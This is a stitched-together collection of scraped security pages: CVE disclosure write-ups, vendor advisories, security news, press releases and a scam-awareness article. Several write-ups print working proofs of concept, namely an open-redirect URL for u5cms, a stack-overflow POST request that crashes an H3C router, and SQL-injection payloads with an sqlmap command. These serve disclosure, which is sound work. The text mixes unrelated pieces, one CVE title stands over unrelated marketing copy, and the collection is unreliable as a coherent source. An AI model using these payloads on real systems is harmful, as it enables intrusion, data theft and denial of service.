An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.

URL redirection vulnerability in u5cms v8.3.5

This script is possibly vulnerable to URL redirection attacks.

URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack.

URL redirection vulnerability exists in /loginsave.php. When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter "u", instead of u5cms' own web page.

The payload is /loginsave.php?u=http://xfs.bxss.me/

When users access this URL, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology

Here are the HTTP request and HTTP response.

HTTP request:

    GET /loginsave.php?u=http://xfs.bxss.me/ HTTP/1.1
    Host: 192.168.116.133
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

HTTP response:

    HTTP/1.1 302 Moved Temporarily
    Date: Sat, 04 Jun 2022 03:09:40 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.3.29
    X-XSS-Protection: 0
    Set-Cookie: u=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; httponly
    Set-Cookie: p=56e2526ba3e8ff31822f36a269d6434027ba5dcd; path=/; httponly
    Location: [http://xfs.bxss.me?1654312181](http://xfs.bxss.me/?1654312181)
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=latin1
    

Eventually, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology/

If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters.

Best wishes!

CVE-2022-32444: URL redirection vulnerability in u5cms v8.3.5 · Issue #50 · u5cms/u5cms

New findings from cybersecurity firm JFrog show that malware targeting the npm ecosystem can evade security checks by taking advantage of an "unexpected behavior" in the npm command line interface (CLI) tool.

npm CLI's install and audit commands have built-in capabilities to check a package and all of its dependencies for known vulnerabilities, effectively acting as a warning mechanism for developers by highlighting the flaws.

But as JFrog established, the security advisories are not displayed when the packages follow certain version formats, creating a scenario where critical flaws could be introduced into their systems either directly or via the package's dependencies.

Specifically, the problem arises only when the installed package version contains a hyphen (e.g., 1.2.3-a), which is included to denote a pre-release version of an npm module.

While the project maintainers treat the discrepancy between regular npm package versions and pre-release versions as an intended functionality, this also makes it ripe for abuse by attackers looking to poison the open source ecosystem.

"Threat actors could exploit this behavior by intentionally planting vulnerable or malicious code in their innocent-looking packages which will be included by other developers due to valuable functionality or as a mistake due to infection techniques such as typosquatting or dependency confusion," Or Peles said.

In other words, an adversary could publish a seemingly benign package that's in the pre-release version format, which could then be potentially picked up by other developers and not be alerted to the fact that the package is malicious despite evidence to the contrary.

The development once again reiterates how the software supply chain is built as a chain of trust relationships between various parties, and how a compromise of one link can affect all downstream applications that consume the rogue third-party dependency.

To counter such threats, it's recommended that developers avoid installing npm packages with a pre-release version, unless the source is known to be completely reliable.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find a Way Malicious NPM Libraries Can Evade Vulnerability Detection

The Robot application in Ip-label Newtest before v8.5R0 was discovered to use weak signature checks on executed binaries, allowing attackers to have write access and escalate privileges via replacing NEWTESTREMOTEMANAGER.EXE.

5 key benefits

**What **Ekara offers****

**The right measures to ensure the **best performance and user satisfaction****

*   Each user of any digital service, wherever they are and regardless of their usage context, expects the best possible experience: anytime, anywhere, any device.
*   We put ourselves in your users’ place, whether they are customers, coworkers, or partners, to ensure the best use of your digital services in keeping with your organization’s objectives.
*   Ekara is the easy-to-use, non-intrusive platform of solutions unique to the market for user experience measurement.

Find out more

**All applications**

Why Ekara?

**A response to your application performance **challenges****

Application performance management means many things in many lines of work. Are you on the front lines handling systems and operations? Or looking at how to best engage users and promote your company digitally? Trying to make sense of technical data in a business context? Seeking to serve your customers better? We have your needs covered. We’ve been helping IT professionals, digital teams, business people, and technology partners for twenty years.

01

You work in IT

Do you need to check the health of your applications? Get diagnostic information in real time, 24/7, to speed up incident resolution? Define precise KPIs for your providers and set up to-the-point dashboards?

Find out more

02

Digital is your domain

You want to make sure your website or mobile app works reliably. Improve your conversion rate and SEO with a high-performing, fast website.

Find out more

03

You work in a non-technical field

You want to make sure applications are available and performing well. You need factual data to help with decision-making.

Find out more

04

Looking for a technology partner?

You need to keep an eye on the quality of service your deliver with respect to SLAs. You need a trustworthy third party to impartially analyze the levels of service you deliver.

Find out more

OUR REFERENCES

**They **trust us****

CVE-2022-23334: Ekara, the eyes of your users

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad.

Permalink

Cannot retrieve contributors at this time

**Affected product**

    H3C GR-1200W MiniGRW1A0V100R006
    

**Firmware**

     https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4AE06C,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4AE06C(int a1)
{
  const char \*v2; // \[sp+1Ch\] \[+1Ch\]
  int v3\[8\]; // \[sp+20h\] \[+20h\] BYREF
  char v4\[64\]; // \[sp+40h\] \[+40h\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  memset(v4, 0, sizeof(v4));
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 507252736, v3);
  if ( atoi((const char \*)v3) )
  {
    if ( atoi((const char \*)v3) == 1 )
      CFG\_Set(0, 520359938, "192.168.1.251;255.255.255.0;VLAN1;2");
  }
  else
  {
    CFG\_Set(0, 520359938, v4);
  }
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=set\_tftp\_upgrad&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29693: fengsha/SetTftpUpgrad.md at main · Stevenbaga/fengsha

Gentoo Linux Security Advisory 202311-7 - A vulnerability has been found in AIDE which can lead to root privilege escalation. Versions greater than or equal to 0.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: AIDE: Root Privilege Escalation  
     Date: November 25, 2023  
     Bugs: #831658  
       ID: 202311-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in AIDE which can lead to root privilege  
escalation.

Background  
==========

AIDE (Advanced Intrusion Detection Environment) is a file and directory  
integrity checker.

It creates a database from the regular expression rules that it finds  
from the config file(s). Once this database is initialized it can be  
used to verify the integrity of the files. It has several message digest  
algorithms (see below) that are used to check the integrity of the file.  
All of the usual file attributes can also be checked for  
inconsistencies.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
app-forensics/aide  < 0.17.4      >= 0.17.4

Description  
===========

A vulnerability has been discovered in AIDE. Please review the CVE  
identifier referenced below for details.

Impact  
======

AIDE before 0.17.4 allows local users to obtain root privileges via  
crafted file metadata (such as XFS extended attributes or tmpfs ACLs),  
because of a heap-based buffer overflow.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All AIDE users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-forensics/aide-0.17.4"

References  
==========

[ 1 ] CVE-2021-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45417

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-07

Badminton Center Management System V1.0 is vulnerable to SQL Injection via parameter 'id' in /bcms/admin/court_rentals/update_status.php.

1.  Description:

Badminton Center Management System allows SQL Injection via parameter 'id' in /bcms/admin/court\_rentals/update\_status.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2.  Proof of Concept:

In Burpsuite intercept the request from the affected page with 'customer\_number' parameter and save it like poc.txt Then run SQLmap to extract the data from the database:

sqlmap.py -r poc.txt --dbms=mysql

3.  Example payloads:

Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: id=test' AND 7374=(SELECT (CASE WHEN (7374=7374) THEN 7374 ELSE (SELECT 6961 UNION SELECT 8511) END))-- -&status=3
    
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=test' AND EXTRACTVALUE(8482,CONCAT(0x5c,0x71627a6b71,(SELECT (ELT(8482=8482,1))),0x71626a6271))-- ukNa&status=3
    
    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: id=test' AND 9267=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- JYkT&status=3
    
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=test' UNION ALL SELECT CONCAT(0x71627a6b71,0x76455372796b6b59767845715272496c626e7a4b6b5a4c664f48736258654b6359576c52474b5356,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&status=3
    

4.  Burpsuite request:

GET /bcms/admin/court\_rentals/update\_status.php?id=2%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f\*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22\*%2f%20%2f\*%2042ef7f74-0853-4e23-9722-b42223e2b1b9%20\*%2f&status=3 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=0oviirpbcg8rf511ik98trenv1 Referer: http://localhost/bcms/admin/court\_rentals/update\_status.php?id=2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

CVE-2022-30490: GitHub - yasinyildiz26/Badminton-Center-Management-System

New 'trust' tool improves online experience and helps tackle digital fraud.

PURCHASE, N.Y., and REDMOND, Wash., April 25, 2022 /PRNewswire/ -- Mastercard on Monday announced the launch of an enhanced identity solution designed to improve the online shopping experience and tackle digital fraud in a new collaboration with Microsoft Corp.

"This builds on our commitment of working across the industry to provide advanced technologies that enable trust."

Mastercard has directly addressed these needs by enhancing its **Digital Transaction Insights** solution with next-generation authentication and real-time decisioning intelligence capabilities. The solution pairs Mastercard's network insights with the merchant's own data to confirm the consumer is who they claim to be, providing financial institutions with the additional intelligence needed to optimize their authorization decisions and approve more genuine transactions. Digital Transaction Insights is used across a wide range of online checkout instances, from click-to-pay functionality and wearables to digital wallets and in-app purchases. Now more than ever, delivering a frictionless shopping experience is critical as retailers look to shift window shopping and price comparison visits to confirmed sales. And, while consumers enjoy the convenience of shopping online, fraudsters also seek to develop new methods to use these same channels for ill-gotten gains. One of the growing types of digital fraud is first-party fraud, where a legitimate purchase is made online but later disputed. First-party fraud is estimated to be a $50 billion global issue.

Ajay Bhalla, president, Cyber and Intelligence at Mastercard, said, "Shopping online should be simple, quick and secure. But that isn't always the case. We're committed to developing advanced identity and fraud technology to help enhance the real-time intelligence we provide to financial institutions around the globe. This builds on our longstanding commitment of working across the industry to provide advanced technologies that enable trust, and help build a safe and thriving digital ecosystem for all."

Microsoft will be the first partner to share its insights and integrate with the new Digital Transaction Insights solution across several lines of business. Building on a long history of cross-collaboration, Microsoft's Dynamics 365 Fraud Protection's proprietary risk assessment, which leverages adaptive AI to assist in real-time fraud detection by identifying risky behaviors across purchase, account and in-store activities, has been integrated with Mastercard's Digital Transaction Insights to better enable real-time intelligence sharing in an easily consumable and actionable format. This will enable issuers to enhance their decision-making processes for authorizations, chargebacks and refunds. Moreover, organizations can improve transaction acceptance rates with insights that help them balance profitability and revenue opportunities against fraud loss and checkout friction.

Charles Lamanna, corporate vice president of Business Applications and Platforms at Microsoft, said, "We are excited to partner with Mastercard to leverage our cloud-native, cutting-edge fraud assessment tools to empower issuers and merchants to prevent more fraud and approve more genuine users. This partnership lays the foundation for the future of global fraud prevention where data silos are no longer a barrier to security."

Digital Transaction Insights is enabled by EMV 3-D Secure and Mastercard Identity Check, a global authentication solution built on the enhanced industry standard. Both elements support GDPR requirements and other related regulations. In 2021 alone, Mastercard Identity Check delivered a 14% uplift in transaction approval rates across billions of transactions.

**Additional resources**

For more information about Microsoft Security solutions, visit Microsoft Security. Bookmark the Security blog to keep up with expert coverage on security matters. Also, follow @msftsecurity for the latest news and updates on cybersecurity.

**About Mastercard (NYSE: MA)**

Mastercard is a global technology company in the payments industry. Our mission is to connect and power an inclusive, digital economy that benefits everyone, everywhere by making transactions safe, simple, smart and accessible. Using secure data and networks, partnerships and passion, our innovations and solutions help individuals, financial institutions, governments and businesses realize their greatest potential. Our decency quotient, or DQ, drives our culture and everything we do inside and outside of our company. With connections across more than 210 countries and territories, we are building a sustainable world that unlocks priceless possibilities for all. www.mastercard.com

**About Microsoft**

Microsoft (Nasdaq "MSFT" @microsoft) enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.

SOURCE Microsoft Corp.

Mastercard Launches Next-Generation Identity Technology with Microsoft

Results from phishing simulation campaigns highlight the five most effective types of phishing email.

**Woburn, MA – June 28, 2022 —** Phishing simulator data from Kaspersky’s Security Awareness Platform shows that workers tend to not notice pitfalls hidden in emails devoted to corporate issues and delivery problem notifications, with one in five (16% to 18%) clicking the link in the email templates imitating these phishing attacks.

According to estimates, 91% of all cyberattacks begin with a phishing email, and phishing techniques are involved in 32% of all successful data breaches.

To provide further insight into this type of threat, Kaspersky analyzed data gathered from a phishing simulator provided voluntarily by users\[1\]. Integrated into Kaspersky Security Awareness Platform, this tool helps companies check if their staff can distinguish a phishing email from a real one without putting corporate data at risk. An administrator chooses from the set of templates, mimicking common phishing scenarios or creates a custom template, then sends it to the group of employees without pre-warning them and tracks the results. A large number of users clicking the link is a clear indication that additional cybersecurity awareness training is required.

According to recent phishing simulation campaigns, the five most effective types of phishing email are:

*   Subject**:** Failed delivery attempt - Unfortunately, our courier was unable to deliver your item. Sender: Mail delivery service. Click conversion: 18.5%
*   Subject: Emails not delivered due to overloaded mail servers. Sender: The Google support team. Click conversion: 18%
*   Subject: Online employee survey: What would you improve about working at the company. Sender: HR Department. Click conversion: 18%
*   Subject: Reminder: New company-wide dress code. Sender: Human Resources. Click conversion: 17.5%
*   Subject: Attention all employees: new building evacuation plan. Sender: Safety Department. Click conversion: 16%

Other phishing emails that gained a significant number of clicks include reservation confirmations from a booking service (11%), a notification about an order placement (11%), and an IKEA contest announcement (10%).

Alternatively, emails that threaten the recipient or offer instant benefits appeared to be less “successful.” A template with the subject “I hacked your computer and know your search history” gained 2% of clicks, while offers for free Netflix and $1,000 by clicking a link tricked just 1% of employees.

_“Phishing simulation is one of the simplest ways to track employees’ cyber-resilience and evaluate the efficiency of their cybersecurity training. However, there are significant aspects that must be considered when conducting this assessment to make it really impactful,”_ comments Elena Molchanova, head of security awareness business development at Kaspersky. _“Since the methods used by cybercriminals are constantly changing, the simulation has to reflect up-to-date social engineering trends, alongside common cybercrime scenarios. It is crucial that simulated attacks are carried out regularly and supplemented with appropriate training – so users will develop a strong vigilance skill that will allow them avoid falling for targeted attacks or so-called spear phishing.”_

To prevent data breaches, and any related financial and reputational losses caused by phishing attacks, Kaspersky recommends the following for businesses:

*   Remind your employees about the basic signs of phishing emails. A dramatic subject line, mistakes and typos, inconsistent sender addresses and suspicious links;
*   If there is any doubt about the received email, check the format of attachments before opening them and the link accuracy before clicking. This can be achieved by hovering over these elements - make sure the address looks authentic and the attached files are not in an executable format;
*   Always report phishing attacks. If you spot a phishing attack, report it to your IT security department and, if possible, avoid opening the malicious email. This will allow your cybersecurity team to reconfigure anti-spam policies and prevent an incident;
*   Supply your employees with basic cybersecurity knowledge. Education should be aimed at changing the behavior of learners and teaching them how to deal with threats. As a major cybersecurity vendor, Kaspersky possesses a relevant base of information on real attacks and continuously supplements its Security Awareness Trainings in accordance with the current threat landscape;
*   Since phishing attempts can be confusing, and there’s no guarantee of avoiding all accident clicks, protect your working devices with reliable security. Choose a solution that provides anti-spam capabilities, tracks suspicious behavior, and creates a backup copy of your files in case of ransomware attacks. Anti-phishing protection is included in some security solutions, even for small and very small businesses, such as Kaspersky Small Office Security.

Kaspersky Reveals Phishing Emails That Employees Find Most Confusing

Red Hat Security Advisory 2023-4671-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.30.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.30 bug fix and security update  
Advisory ID:       RHSA-2023:4671-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4671  
Issue date:        2023-08-23  
CVE Names:         CVE-2023-25173  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.30 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.30. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4674

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* containerd: Supplementary groups are not set up properly (CVE-2023-25173)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:86ee723d4dc2a83f836232d1d03f8b4193940c50a2636ee86924acb5d14b0b64

(For s390x architecture)  
The image digest is  
sha256:c6e023eaa4e80a044bbaeaed5b578d18afddf0b52ad12571ee3a42aa0ff5862a

(For ppc64le architecture)  
The image digest is  
sha256:0a1dbd83d0552d0332c327d9bd9b1fce8ed73d89937178208d29a73276b72c1c

(For aarch64 architecture)  
The image digest is  
sha256:21145f1df3c0e88d50de5c697d7fab316f4792f91320a7196ed0dfd94396c0d9

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-14386 - Update cluster-bootstrap 4.12 dependencies and image  
OCPBUGS-16410 - ensure fixes land for large inodes  
OCPBUGS-16846 - [Openshift Pipelines] Stop option for pipelinerun is not working  
OCPBUGS-17192 - "Duplicate RoleBinding" leads to "Unsupported value" error  
OCPBUGS-17558 - [4.12] Missing Azure File CSI NFS support

6. References:

https://access.redhat.com/security/cve/CVE-2023-25173  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5nCxAAoJENzjgjWX9erEilsQAI+QV6P2sngvpUvxGsvsK5Kx  
fa9w7/Er51AeI7LUWmArvj0pgKumjEr/toRD3fC/YfTm8jHhszDL2aFtk1zU54vR  
qIqajS6LDdILAJ0U8d9amuu5YxH8DFnyQYAfc+aYFyTaEy1i2Q/Rp0HcUa91pN3x  
eq4gyrRsYP+ovBK0XZqHw50Cx5Qn++ONIPlhOabbsmx5TtmQU0YxDe++LJ5yoT2O  
uGQPTcxE6WdqsC5Ulvx+F6XXbg2ITmxMiltu3Oln4ySKPCp+JhLyh4wJIuucqYVL  
slT3/wMsOHD2IRkxGI7rHMnemaemHPlDkHttLd/2M9LO2u1u+MWHfUzqHB+7qQGp  
HtlICid3TfX6lL6ypcF0DzbcvU/gc9Ju0f2YCdlLsitMe3Gr6RskWpVtkDRZ4zRb  
xVeOGqek4WSP8gouYYZlL+iciapy3yiL4EUR4s8jIBAjGChU9+/d/gbumKzCrNup  
cV9ypdsKPKs2PrnZLqeP1ryT3ZR7kaoM65h7UbBKb3oC4U2/BcJj+d679mqveOR/  
Y/ESqqU3tdHwavxtHsZJGhhhgpEklio/sqoYh4EsIe+qgDmHMXVcwZK6pBswE5zO  
frigYOAMEE3l8zVBsDDdOuc+gIXpzdp4rRrk9Mni7E9/MV5NB2LrOJxPkfk+9LBc  
OC/3MhzxhOnlqiEoTb5J  
¿lD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4671-01

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as…

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as legitimate platforms, these apps defraud investors, bypassing store checks and exploiting unsuspecting users globally.

A fraud campaign targeting **Apple iOS and Android users** has been discovered by GroupIB, involving fake trading apps. These apps, found on Apple’s App Store and Google Play, and on phishing sites, are part of a Pig Butchering scam targeting cryptocurrency investors in Asia-Pacific, Middle East & Africa, and European regions.

Group-IB’s Threat Intelligence, and Fraud Protection analysts first discovered these fake mobile applications in May 2024 and have been investigating the campaign ever since.

According to their **report** shared with Hackread.com ahead of publishing on Wednesday, these applications were developed for Android using a single cross-platform framework. One was distributed through the Google Play store, while another targeted iOS devices.

What’s worse, unlike traditional mobile trojans, these applications had no typical malicious features and cybercriminals have created a facade of a legitimate trading platform to defraud victims.

The fraudulent apps check the current date and time to bypass Apple’s App Store checks, launching a fake activity with mathematical formulas and graphics if it is earlier than 22 July 2024, 00:00:00. Android samples were designed to display a fraudulent trading application hosted on the api.fxbrokerscc domain, part of a larger fraudulent infrastructure.

According to researchers, these fake trading apps and downloader apps mimic legitimate platforms and may include features like account settings, transaction history, and stock information. Downloader apps, found in the Apple App Store or distributed through phishing websites, prompt victims to install the fraudulent app.

Fake app on Apple Store (left) – Fake app on Google Play Store (Screenshot: Ground-IB)

The malware family used in the pig butchering scam is **UniShadowTrade**, classified under the UniApp Framework. This name is given by Group-IB analysts to categorize the fraudulent applications involved in the scam. For your information, the UniApp framework enables developers to create cross-platform applications with a single codebase, making it easier for scammers to develop and distribute malware.

****What Exactly is Pig Butchering?****

For your information, **Pig butchering** is a notorious digital scam that involves a meticulous process of grooming victims, building trust, and ultimately defrauding them of their money.

This particular campaign follows a specific pattern: target identification through social media, grooming and trust-building through social engineering techniques, offering a seemingly lucrative investment opportunity in cryptocurrency or other investments, encouraging a small initial investment, and building confidence through small profits.

Scammers pressure victims into making large investments, transfer funds they cannot withdraw, and disappear. This process continues until the victim is unable to withdraw the funds, causing significant financial loss and affecting their financial stability.

Nevertheless, scams Pig butchering can have devastating consequences for victims. Understanding scammers’ tactics and taking proactive measures can reduce the risk of falling victim to such fraud.

****Alert for Android and iOS users****

It is a fact that Google, which owns Android, and Apple, which owns the iOS App Store, try their best to keep the marketplace safe from malware and other cybersecurity threats. Despite constant monitoring, cybercriminals often slip into these stores with malicious apps, draining the bank accounts and crypto wallets of unsuspecting users.

Just last week, **Google approved** a crypto drainer app on the Play Store that stole over $70,000 from Android users. On the other hand, **in February 2024**, Apple approved a fake LastPass Password Manager app on its iOS App Store. The same month, Apple approved a **fake Rabby Wallet app** that stole millions from unsuspecting users.

Therefore, be extra careful when downloading an app from any of these stores. Check their reviews, search for the official app on Google, find their social media platforms, and confirm whether the app advertised on app stores is legitimate or not.

1.  **Phishing Scam Hits European Bank Users on iOS and Android**
2.  **Scylla Ad Fraud on iOS, Android Users Halted by Apple, Google**
3.  **Pink Drainer Posed as Journalists, Stole $3M from Twitter Users**
4.  **Hackers Posed as Google Support to Steal $243 Million in Crypto**
5.  **Apple mistakenly approved malware masked as Adobe Flash Player**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us